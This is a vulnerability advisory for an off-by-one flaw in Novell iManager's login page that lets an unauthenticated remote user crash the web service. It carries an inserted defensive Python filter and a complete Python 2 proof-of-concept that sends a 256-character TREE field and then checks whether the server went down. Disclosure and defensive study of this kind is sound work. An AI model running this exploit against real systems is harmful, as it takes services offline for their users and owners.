Vulnerability cause
Boundary condition error
Severity
Low
Affected systems
Novell iManager 2.7.3
Novell iManager 2.7.2
Novell iManager 2.7.1
Novell iManager 2.5
Novell iManager 2.0.2
Novell iManager 2.0
Novell iManager 1.5
Novell iManager 2.7.3 FTF2
Novell iManager 2.7.0
Novell iManager 2.6.0
Unaffected systems
Novell iManager 2.7.4
Novell iManager 2.7.3 FTF4
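Impact
Remote attackers can exploit the vulnerability to crash the application.
Attack prerequisites
The attacker must be able to access Novell iManager.
Vulnerability details
Novell iManager is a web-based application that allows Novell eDirectory objects to be managed and configured using wireless devices.
The code responsible for handling Novell iManager logins contains an off-by-one error, which allows a remote unauthenticated user to crash the iManager web service.
All three input fields on the iManager login page define a maximum length of 256 bytes to limit the number of characters that can be entered in each field. However, if a login request sent to the web server contains a TREE field that is 256 characters long, the iManager Tomcat web server crashes, leaving the application unavailable.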
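As an added example (not part of the original advisory and not Novell's code), the following Python 3 check shows how a front-end filter or a log review could flag login requests whose tree field reaches the 256-character limit described above. The names `oversized_tree_values` and `should_block` are hypothetical, the sample requests are constructed, and rejecting at 256 or more UTF-8 bytes after URL-decoding is an assumption chosen to be conservative.

```python
from urllib.parse import parse_qsl

LOGIN_PATH = "/nps/servlet/webacc"  # login servlet path used by the PoC on this page
FIELD_LIMIT = 256                   # field length named in the advisory
GUARDED_FIELD = "tree"              # the field the advisory says triggers the crash


def oversized_tree_values(body, limit=FIELD_LIMIT):
    """Return the decoded byte lengths of every tree value at or above limit.

    Lengths are taken after URL-decoding, so 'A' and '%41' each count once.
    UTF-8 byte length is used because it is never smaller than the character
    count (assumption: reject on whichever measure reaches the limit first).
    Field names are compared case-insensitively and repeated fields are all checked.
    """
    lengths = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name.lower() != GUARDED_FIELD:
            continue
        size = len(value.encode("utf-8", errors="replace"))
        if size >= limit:
            lengths.append(size)
    return lengths


def should_block(method, path, body):
    """True when a login POST carries a tree value of 256 bytes or more."""
    if method.upper() != "POST" or path.split("?", 1)[0] != LOGIN_PATH:
        return False
    return bool(oversized_tree_values(body))


# Constructed sample requests (method, path, body); not captured traffic.
SAMPLES = [
    ("POST", LOGIN_PATH, "username=admin&password=x&tree=CORP_TREE"),
    ("POST", LOGIN_PATH, "username=admin&password=x&tree=" + "A" * 255),
    ("POST", LOGIN_PATH, "username=admin&password=x&tree=" + "%41" * 256),
    ("POST", LOGIN_PATH, "TREE=short&tree=" + "A" * 300),
    ("GET", LOGIN_PATH, ""),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        verdict = "BLOCK" if should_block(method, path, body) else "allow"
        print(verdict, method, path, "body_len=%d" % len(body))
```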
Test method
# Python 2 script (uses httplib and print statements)
# Usage: $ python poc.py <iManager_IP> <iManager_Port>
# E.g:   $ python poc.py 192.168.0.1 48080
import socket
import sys
import time
import httplib


def server_uses_SSL(host, port):
    # Try to determine if the server is using HTTP over SSL or not.
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-Language': 'en-us,en;q=0.5',
               'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
               'Connection': 'close'}
    using_ssl = True
    conn = httplib.HTTPSConnection(host, port)
    try:
        conn.request('GET', '/nps/servlet/webacc', headers=headers)
        response = conn.getresponse()
    except socket.sslerror:
        using_ssl = False
    finally:
        conn.close()
    return using_ssl


def post_urlencoded_data(host, port, selector, body, use_ssl, get_resp=True):
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-Language': 'en-us,en;q=0.5',
               'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
               'Referer': 'http://%s:%s%s' % (host, port, '/nps/servlet/webacc'),
               'Content-Type': 'application/x-www-form-urlencoded',
               'Content-Length': str(len(body)),
               'Connection': 'close'}
    if use_ssl:
        conn = httplib.HTTPSConnection(host, port)
    else:
        conn = httplib.HTTPConnection(host, port)
    conn.request('POST', selector, body, headers)
    html = ''
    # This flag allows me to avoid keeping waiting for a server response in the last step, when the webserver is crashed
    if get_resp:
        response = conn.getresponse()
        html = response.read()
    conn.close()
    return html


def getPostParameters():
    params = 'rank=primary&DoLogin=true&forceMaster=false'
    params += '&username=admin&password=mipass&tree=%s&Entrada.x=27&Entrada.y=13' % ('A' * 256)
    return params


def main():
    host = sys.argv[1]
    port = int(sys.argv[2])
    # Determine if the server uses plain HTTP (iManager Workstation) or HTTPS (iManager Server)
    uses_ssl = server_uses_SSL(host, port)
    if uses_ssl:
        print '(+) The server uses HTTP over SSL. Guessed target: iManager Server.'
    else:
        print '(+) The server uses plain HTTP. Guessed target: iManager Workstation.'
    print '(+) Sending login request with 256-character long TREE field...'
    post_urlencoded_data(host, port, '/nps/servlet/webacc', getPostParameters(), uses_ssl, False)
    print '(+) Malicious request successfully sent.'
    # Wait 10 seconds and try to connect again to iManager, to check if it's down
    print '(+) Waiting 10 seconds before trying to reconnect to iManager...'
    time.sleep(10)
    try:
        print '(+) Trying to reconnect...'
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.close()
        print '(!) Something went wrong. Novell iManager is still alive.'
    except socket.error:
        print '(*) Attack successful. Novell iManager is down.'


if __name__ == '__main__':
    main()
Vendor solution
No detailed solution is currently available:
http://www.novell.com/products/consoles/imanager/features.html
Vulnerability credit
Francisco Falcon from Core Security Technologies